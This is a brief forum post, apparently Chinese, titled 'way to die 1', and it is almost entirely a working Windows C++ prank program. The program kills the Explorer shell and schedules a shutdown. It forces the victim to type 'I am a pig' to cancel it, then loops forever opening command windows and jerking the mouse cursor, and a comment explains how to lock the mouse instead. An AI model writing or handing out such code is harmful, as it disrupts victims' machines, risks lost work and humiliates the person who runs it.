死法1
2025-06-22 11:35:16
发布于:浙江
#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int main (){
system("taskkill /F /IM explorer.exe");
cout << "你的电脑将在一分钟内关机\n";
system("shutdown /s /t 60");
again:
cout << "请输入:\"我是猪\"";
string s;
cin >> s;
if (s == "我是猪")
system("shutdown /a");
else
goto again;
while(true){
system("start cmd");
int x = rand()%900+1, y = rand()%900+1;//如果想锁定鼠标就把x和y设定成固定数值
SetCursorPos(x,y);
}
return 0;
}
这里空空如也
有帮助,赞一个